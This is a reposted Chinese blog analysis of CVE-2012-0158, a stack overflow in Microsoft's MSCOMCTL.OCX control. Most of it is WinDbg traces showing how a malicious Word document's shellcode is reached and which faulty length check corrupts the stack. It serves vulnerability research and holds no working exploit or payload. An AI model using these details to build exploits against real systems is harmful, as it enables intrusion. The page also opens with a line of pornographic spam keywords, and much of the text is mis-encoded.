久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2012-0158 MSCOMCTL控件漏洞分析

發(fā)布時(shí)間:2023/12/31 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2012-0158 MSCOMCTL控件漏洞分析 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

CVE-2012-0158 MSCOMCTL控件漏洞分析

作者:chence????? 時(shí)間:27/4/2012

?轉(zhuǎn)載請注明出處??囱╂溄?#xff1a;http://bbs.pediy.com/showthread.php?t=149957

分析環(huán)境:windows xp sp2word 2007版本:12.0.4518.1014

?

本次調(diào)試采用Windbg,原因有二:

1.??????用OD或者ImunityDBG調(diào)試office漏洞很卡,還經(jīng)常運(yùn)行的時(shí)候WORD點(diǎn)擊沒反應(yīng)。有時(shí)還會出現(xiàn)一些奇怪的違反訪問錯(cuò)誤。這樣你在調(diào)試時(shí),可能調(diào)試了半天,漏洞卻還沒觸發(fā),卻碰到一大堆的違反訪問,程序沒奔潰,你已經(jīng)奔潰了···

2.??????WinDBG執(zhí)行效率高,還會記錄執(zhí)行的路徑,并且有強(qiáng)大的腳本做后盾,一些指令很好用哦,呵呵。

?

Windbg附加Winword進(jìn)程,給GetFileSize(這個(gè)函數(shù)是這種惡意文檔釋放木馬和正常文檔必調(diào)的一個(gè)函數(shù))下斷點(diǎn)。每次中斷,你都用kb指令看下調(diào)用路徑,如果發(fā)現(xiàn)調(diào)用路徑不正常,則本次調(diào)用就處于shellocde當(dāng)中。經(jīng)過幾次的中斷之后,發(fā)現(xiàn)了蹤跡,如下圖所示:

0:000> kb

ChildEBPRetAddr? Args to Child?????????????

0012245800122773 00000001 00122498 275c8b91 kernel32!GetFileSize

WARNING: FrameIP not in any known module. Following frames may be wrong.

001224a000122519 1005c48b c7000001 4d032400 0x122773

00000000 0000000000000000 00000000 00000000 0x122519

?

gu執(zhí)行至返回再單步,你就處于shellocde的包圍圈了。

001227608d45f8????????? lea???? eax,[ebp-8]

00122763 50????????????? push??? eax

00122764ff75fc????????? push??? dword ptr [ebp-4]

00122767e8bcfdffff????? call??? 00122528

0012276c050d000000????? add???? eax,0Dh

00122771ff10? ????????call dword ptr [eax]ds:0023:001224c7={kernel32!GetFileSize (7c810c8f)}

001227738945f4????????? mov???? dword ptr [ebp-0Ch],eax

0012277683f8ff????????? cmp????eax,0FFFFFFFFh

001227797507????? ??????jne????00122782

0012277be9be010000????? jmp???? 0012293e

00122780eb0b??????????? jmp???? 0012278d

?

看下該段代碼處于那段空間:

0:000>!address eip

??? 00030000 : 00114000 - 0001c000

??????????????????? Type???? 00020000 MEM_PRIVATE

??????????????????? Protect? 00000004 PAGE_READWRITE

??????????????????? State??? 00001000 MEM_COMMIT

??????????????????? Usage??? RegionUsageStack

??????????????????? Pid.Tid? 5ac.7cc

很明顯shellocde處于棧中,內(nèi)存屬性為PAGE_READWRITE(如果打開DEP,估計(jì)就執(zhí)行不了了)

先不細(xì)看shellocdeshellocde的開始位置始于:0x12253d。根據(jù)網(wǎng)上已知的資料,知道是MSCOMCTL.OCX控件的問題,故設(shè)置一個(gè)加載斷點(diǎn):

sxe ld MSCOMCTL.OCX

在此處中斷后,應(yīng)該離觸發(fā)不遠(yuǎn)了。單步執(zhí)行至加載處,再下GetFileSize的斷點(diǎn),加個(gè)路障,防止調(diào)試器把shellocde一步執(zhí)行完了。

不斷的F10,大概30步后,WINDBG離奇地中斷在GetFileSize了,這時(shí)kb一下,發(fā)現(xiàn)已經(jīng)執(zhí)行到了shellcode了。馬上到CMD窗口代碼堆里找最近的函數(shù):

wwlib!DllCanUnloadNow+0x3145b9:

31e028fbff732c????????? push??? dword ptr [ebx+2Ch]? ds:0023:06ba3dec=083d0670

0:000> p

eax=001ef34cebx=06ba3dc0 ecx=27582c70 edx=001ef2f8 esi=00000000 edi=06973e08

eip=31e028feesp=001225b0 ebp=00122658 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

wwlib!DllCanUnloadNow+0x3145bc:

31e028fe8b08??????????? mov???? ecx,dword ptr [eax]? ds:0023:001ef34c=2759d668

0:000> p

eax=001ef34cebx=06ba3dc0 ecx=2759d668 edx=001ef2f8 esi=00000000 edi=06973e08

eip=31e02900esp=001225b0 ebp=00122658 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

wwlib!DllCanUnloadNow+0x3145be:

31e02900 50????????????? push??? eax

0:000> p

eax=001ef34c ebx=06ba3dc0ecx=2759d668 edx=001ef2f8 esi=00000000 edi=06973e08

eip=31e02901esp=001225ac ebp=00122658 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

wwlib!DllCanUnloadNow+0x3145bf:

31e02901ff5118????????? call??? dword ptr [ecx+18h]? ds:0023:2759d680=27600cea

0:000> p

Breakpoint 0 hit

eax=001224c7ebx=083d0810 ecx=7c801bf6 edx=00000165 esi=001224ff edi=0012250b

eip=7c810c8fesp=0012245c ebp=001224a0 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

kernel32!GetFileSize:

7c810c8f8bff??????????? mov???? edi,edi

發(fā)現(xiàn)最近調(diào)用的那個(gè)函數(shù)是:

wwlib!DllCanUnloadNow+0x3145bf:

31e02901ff5118????????? call??? dword ptr [ecx+18h]? ds:0023:2759d680=27600cea

就是因?yàn)?span style="font-family:Calibri">PASS這個(gè)函數(shù)導(dǎo)致了shellcode的執(zhí)行。再看看其屬于哪個(gè)模塊

0:000> lm

start??? end???????module name

0302000003093000?? Resource?? (deferred)????????????

10000000102a6000?? SOGOUPY??? (deferred)????????????

1100000011050000?? SYMINPUT?? (deferred)????????????

2000000020549000?? xpsp2res?? (deferred)????????????

27580000 27686000??MSCOMCTL??(export symbols)??????C:\WINDOWS\system32\MSCOMCTL.OCX

3000000030057000?? WINWORD??? (export symbols)?????? C:\Program Files\MicrosoftOffice\Office12\WINWORD.EXE

31240000322ec000?? wwlib????? (export symbols)?????? C:\Program Files\MicrosoftOffice\Office12\wwlib.dll

果然屬于MSCOMCTL.OCX控件空間。

下一步就是在該函數(shù)下斷點(diǎn)。成功在該地址中斷后,一步步跟下來:

看下此時(shí)的棧調(diào)用路徑:

0:000> kb l4

ChildEBPRetAddr? Args to Child?????????????

WARNING: Stackunwind information not available. Following frames may be wrong.

001225a431e02904 001efbf4 083e0670 00000000 MSCOMCTL!DllUnregisterServer+0xc07

0012265831772877 06c04c80 00000000 06c04c80 wwlib!DllCanUnloadNow+0x3145c2

0012270c3173a003 06c04c80 00000000 00000000 wwlib!wdCommandDispatch+0x151602

正常,繼續(xù)單步。走了幾步之后跳到了shellcode當(dāng)中去了:

MSCOMCTL!DllUnregisterServer+0xc30:

27600d138b08??????????? mov???? ecx,dword ptr [eax]? ds:0023:001efbf0=2759d690

0:000> p

eax=001efbf0ebx=06c04c80 ecx=2759d690 edx=00000000 esi=00000000 edi=079f3d48

eip=27600d15esp=0012259c ebp=001225a4 iopl=0????????nv up ei pl nz ac pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000217

MSCOMCTL!DllUnregisterServer+0xc32:

27600d15 50????????????? push??? eax

0:000> p

eax=001efbf0ebx=06c04c80 ecx=2759d690 edx=00000000 esi=00000000 edi=079f3d48

eip=27600d16esp=00122598 ebp=001225a4 iopl=0????????nv up ei pl nz ac pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000217

MSCOMCTL!DllUnregisterServer+0xc33:

27600d16 ff5114?????????call??? dword ptr [ecx+14h]? ds:0023:2759d6a4=275c1284

0:000> p

Breakpoint 0 hit

eax=001224c7ebx=083e0810 ecx=7c801bf6 edx=00000165 esi=001224ff edi=0012250b

eip=7c810c8fesp=0012245c ebp=001224a0 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

kernel32!GetFileSize:

7c810c8f8bff??????????? mov???? edi,edi

0:000> p

eax=001224c7 ebx=083e0810ecx=7c801bf6 edx=00000165 esi=001224ff edi=0012250b

eip=7c810c91esp=0012245c ebp=001224a0 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

0:000> kb

ChildEBPRetAddr? Args to Child?????????????

WARNING: Stackunwind information not available. Following frames may be wrong.

0012245800122773 00000001 00122498 275c8b91 kernel32!GetFileSize+0x3

001224a000122519 1005c48b c7000001 4d032400 0x122773

0000000000000000 00000000 00000000 00000000 0x122519

繼續(xù)跟蹤函數(shù)275c1284(MSCOMCTL!DllGetClassObject+0x3324b)。離成功不遠(yuǎn)了,堅(jiān)持下去。

所下斷點(diǎn)如下:

0:000> bl

?0 e 7c810c8f???? 0001 (0001)? 0:**** kernel32!GetFileSize

?1 e 7c86114d???? 0001 (0001)? 0:**** kernel32!WinExec

?2 e 317d225f???? 0001 (0001)? 0:**** wwlib!wdCommandDispatch+0x1b0fea

?3 e 27600cea???? 0001 (0001)? 0:**** MSCOMCTL!DllUnregisterServer+0xc07

?4 e 275c1284???? 0001 (0001)? 0:**** MSCOMCTL!DllGetClassObject+0x3324b

?5 e 2758fa7d???? 0001 (0001)? 0:**** MSCOMCTL!DllGetClassObject+0x1a44

?6 e 275c12bc???? 0001 (0001)? 0:**** MSCOMCTL!DllGetClassObject+0x33283

?7 e 275e76d4???? 0001 (0001)? 0:**** MSCOMCTL!DLLGetDocumentation+0xf9a

?8 e 275e776f???? 0001 (0001)? 0:**** MSCOMCTL!DLLGetDocumentation+0x1035

?9 e 275e7426????0001 (0001)? 0:**** MSCOMCTL!DLLGetDocumentation+0xcec

最后的調(diào)用嵌套關(guān)系為:

MSCOMCTL!DllUnregisterServer+0xc07;

MSCOMCTL!DllGetClassObject+0x3324b;

?MSCOMCTL!DllGetClassObject+0x33270:

275c12a9 ?e8cfe7fcff????? call???MSCOMCTL!DllGetClassObject+0x1a44 (2758fa7d)

??????????????????????????? MSCOMCTL!DllGetClassObject+0x1a62:

2758fa9b ?ff5038????????? call??? dword ptr [eax+38h]? ds:0023:2759d840=275c12bc

???????????????????????????????????? MSCOMCTL!DllGetClassObject+0x3c612:

275ca64b ?ff5114????? call ???dword ptr [ecx+14h]? ds:0023:2759dc54=275e76d4

?????????????????????????????????????????????? MSCOMCTL!DLLGetDocumentation+0x1035:

275e776f ?ff5114?????call??? dword ptr [ecx+14h]? ds:0023:275c1724=275e7415MSCOMCTL!DLLGetDocumentation+0xcdb

??????????????????????????????????????????????????????? MSCOMCTL!DLLGetDocumentation+0xcec:

275e7426 ?e82317feff? ?call ?MSCOMCTL!DllGetClassObject+0x3ab15

跟進(jìn)這個(gè)函數(shù),發(fā)現(xiàn)執(zhí)行至函數(shù)末尾后,棧里的數(shù)據(jù)就被破壞得一塌糊涂了。下面一下來看下MSCOMCTL!DllGetClassObject+0x3ab15:(外圍函數(shù),且稱之為A)函數(shù)的流程:

275c8b4e 55????????????? push??? ebp

調(diào)用棧:

0:000> kb l4

ChildEBPRetAddr? Args to Child?????????????

WARNING: Stackunwind information not available. Following frames may be wrong.

00122498275e742b 001a120c 08150810 00000000 MSCOMCTL!DllGetClassObject+0x3ab15

001224c0275e7772 001a120c 08150810 08150810 MSCOMCTL!DLLGetDocumentation+0xcf1

001224e0 275ca64e001a1658 08150810 001a14b0 MSCOMCTL!DLLGetDocumentation+0x1038

001225602758fa9e 001a1460 00000000 08150810 MSCOMCTL!DllGetClassObject+0x3c615

0:000> p

eax=001a120cebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b4fesp=00122498 ebp=001224c0 iopl=0????????nv up ei pl nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000216

MSCOMCTL!DllGetClassObject+0x3ab16:

275c8b4f8bec??????????? mov???? ebp,esp

0:000> p

eax=001a120cebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b51esp=00122498 ebp=00122498 iopl=0????????nv up ei pl nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000216

MSCOMCTL!DllGetClassObject+0x3ab18:

275c8b51 83ec14?????????sub????esp,14h //只開辟了14h大小的棧空間

0:000> p

eax=001a120cebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b54esp=00122484 ebp=00122498 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3ab21:

275c8b5a6a0c??????????? push??? 0Ch

0:000> p

eax=001a120cebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b5cesp=00122474 ebp=00122498 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3ab23:

275c8b5c8d45ec????????? lea???? eax,[ebp-14h]

0:000> p

eax=00122484ebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b5fesp=00122474 ebp=00122498 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3ab26:

275c8b5f 53????????????? push??? ebx

0:000> p

eax=00122484ebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b60esp=00122470 ebp=00122498 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3ab27:

275c8b60 50????????????? push??? eax

0:000> p

eax=00122484ebx=08150810 ecx=275c1710 edx=00000001 esi=001a120c edi=00000000

eip=275c8b61esp=0012246c ebp=00122498 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3ab28:

275c8b61 e88efdffff?????call???MSCOMCTL!DllGetClassObject+0x3a8bb (275c88f4)//第一次調(diào)用

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b66 esp=0012246cebp=00122498 iopl=0???????? nv up ei ngnz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3ab2d:

275c8b6683c40c????????? add???? esp,0Ch

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b69esp=00122478 ebp=00122498 iopl=0????????nv up ei pl nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000216

MSCOMCTL!DllGetClassObject+0x3ab30:

275c8b69 85c0 ???????????test??? eax,eax

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b6besp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000??????????? ?efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab32:

275c8b6b7c6c??????????? jl????? MSCOMCTL!DllGetClassObject+0x3aba0(275c8bd9) [br=0]

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b6desp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab34:

275c8b6d817dec436f626a? cmp???? dword ptr [ebp-14h],6A626F43hss:0023:00122484=6a626f43

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b74esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab3b:

275c8b740f85f9a20000??? jne???? MSCOMCTL!DllGetClassObject+0x44e3a(275d2e73) [br=0]

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b7aesp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab41:

275c8b7a 837df408???????cmp????dword ptr [ebp-0Ch],8 ss:0023:0012248c=00008282

?0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b7eesp=00122478 ebp=00122498 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab45:

275c8b7e 0f82efa20000???jb?????MSCOMCTL!DllGetClassObject+0x44e3a (275d2e73) [br=0]// 第二個(gè)參數(shù)與8比較,小于則結(jié)束。這句話直接導(dǎo)致了漏洞的發(fā)生,應(yīng)該是程序員不小心犯了一個(gè)錯(cuò)誤,本來應(yīng)該是大于8則結(jié)束

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b84esp=00122478 ebp=00122498 iopl=0?? ??????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab4b:

275c8b84ff75f4????????? push??? dword ptr [ebp-0Ch]? ss:0023:0012248c=00008282

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b87esp=00122474 ebp=00122498 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab4e:

275c8b87 8d45f8????????? lea???? eax,[ebp-8]

0:000> p

eax=00122490ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b8aesp=00122474 ebp=00122498 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000?? ??????????efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab51:

275c8b8a 53????????????? push??? ebx

0:000> p

eax=00122490ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b8besp=00122470 ebp=00122498 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab52:

275c8b8b 50????????????? push??? eax

0:000> p

eax=00122490ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b8c esp=0012246cebp=00122498 iopl=0???????? nv up ei plnz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3ab53:

275c8b8c e863fdffff?????call???MSCOMCTL!DllGetClassObject+0x3a8bb (275c88f4)//第二次調(diào)用

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8b91esp=0012246c ebp=00122498 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3ab58:

275c8b918bf0??????????? mov???? esi,eax

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b93esp=0012246c ebp=00122498 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3ab5a:

275c8b9383c40c????????? add???? esp,0Ch

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b96esp=00122478 ebp=00122498 iopl=0????????nv up ei pl nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000216

MSCOMCTL!DllGetClassObject+0x3ab5d:

275c8b9685f6??????????? test??? esi,esi

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b98esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab94:

275c8bcd837dfc00??????? cmp? ???dword ptr [ebp-4],0? ss:0023:00122494=00000000

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd1esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab98:

275c8bd10f85a6a20000??? jne???? MSCOMCTL!DllGetClassObject+0x44e44(275d2e7d) [br=0]

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd7esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab9e:

275c8bd78bc6??????????? mov???? eax,esi

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd9esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba0:

275c8bd9 5f????????????? pop???? edi

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8bdaesp=0012247c ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000??????????? ?efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba1:

275c8bda 5e????????????? pop???? esi

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8bdbesp=00122480 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba2:

275c8bdb 5b????????????? pop???? ebx

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8bdcesp=00122484 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba3:

275c8bdc c9????????????? leave

0:000> p

eax=00000000ebx=08150810 ecx=7c93056d edx=00150608 esi=001a120c edi=00000000

eip=275c8bddesp=0012249c ebp=00000000 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba4:

275c8bddc20800????????? ret???? 8

0:000> kb

ChildEBPRetAddr? Args to Child?????????????

WARNING: Stackunwind information not available. Following frames may be wrong.

0000000000000000 00000000 00000000 00000000 MSCOMCTL!DllGetClassObject+0x3aba4

調(diào)用了兩次MSCOMCTL!DllGetClassObject+0x3a8bb(275c88f4),且稱之為B。

第二次調(diào)用函數(shù)時(shí)壓的三個(gè)參數(shù):

0:000> dd espl3

0012246c? 00122490 ?07f80810 ?00008282

第一個(gè)參數(shù)指向棧內(nèi),第二個(gè)參數(shù)指向一片內(nèi)存區(qū)域,第三個(gè)為大小(后面得知)。

下面一起來看看MSCOMCTL!DllGetClassObject+0x3a8bb(275c88f4),函數(shù)有點(diǎn)長,整個(gè)代碼如下(此處是第二次調(diào)用B函數(shù)的情形):

//==========================================================================//

275c88f4 55????????????? push??? ebp

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88f5esp=00122464 ebp=00122498 iopl=0??????? ?nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8bc:

275c88f58bec??????????? mov???? ebp,esp

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88f7esp=00122464 ebp=00122464 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8be:

275c88f7 51????????????? push??? ecx

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88f8esp=00122460 ebp=00122464 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8bf:

275c88f8 53????????????? push??? ebx

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88f9esp=0012245c ebp=00122464 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8c0:

275c88f98b5d0c????????? mov???? ebx,dword ptr [ebp+0Ch]ss:0023:00122470=07f80810

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88fc esp=0012245cebp=00122464 iopl=0???????? nv up ei plnz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8c3:

275c88fc 56????????????? push??? esi

0:000> db ebx

07f80810? d8 57 99 76 b4 57 99 76-60 57 99 76 48 57 9976? .W.v.W.v`W.vHW.v

07f80820? 28 57 99 76 00 00 00 00-00 00 00 00 00 00 0000? (W.v............

07f80830? 01 00 00 00 2c 08 00 00-f0 05 00 00 48 07 0000? ....,.......H...

07f80840? 80 3b 00 00 a0 3c f8 07-45 58 53 54 01 00 0000? .;...<..EXST....

07f80850? 20 07 00 00 00 00 00 00-28 00 00 00 01 00 0000?? .......(.......

07f80860? 68 02 00 00 00 00 00 00-05 00 00 00 00 00 0000? h...............

07f80870? 00 00 00 00 a0 33 00 00-01 00 00 00 80 3b 0000? .....3.......;..

07f80880? b0 00 00 00 00 00 00 00-d0 58 99 76 b0 58 9976? .........X.v.X.v

0:000> p

eax=00122490ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c88fdesp=00122458 ebp=00122464 iopl=0????????nv up ei pl nz ac po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000212

MSCOMCTL!DllGetClassObject+0x3a8ca:

275c89038d4dfc????????? lea???? ecx,[ebp-4]

0:000> p

eax=769957d8ebx=07f80810 ecx=00122460 edx=00150608 esi=00000000 edi=00000000

eip=275c8906esp=00122450 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8cd:

275c89066a04??????????? push??? 4

0:000> p

eax=769957d8ebx=07f80810 ecx=00122460 edx=00150608 esi=00000000 edi=00000000

eip=275c8908esp=0012244c ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8cf:

275c8908 51????????????? push??? ecx

0:000> p

eax=769957d8ebx=07f80810 ecx=00122460 edx=00150608 esi=00000000 edi=00000000

eip=275c8909esp=00122448 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8d0:

275c8909 53????????????? push??? ebx

0:000> p

eax=769957d8ebx=07f80810 ecx=00122460 edx=00150608 esi=00000000 edi=00000000

eip=275c890aesp=00122444 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8d1:

275c890a ff500c?????????call??? dword ptr [eax+0Ch]? ds:0023:769957e4=769d9f59

0:000> p

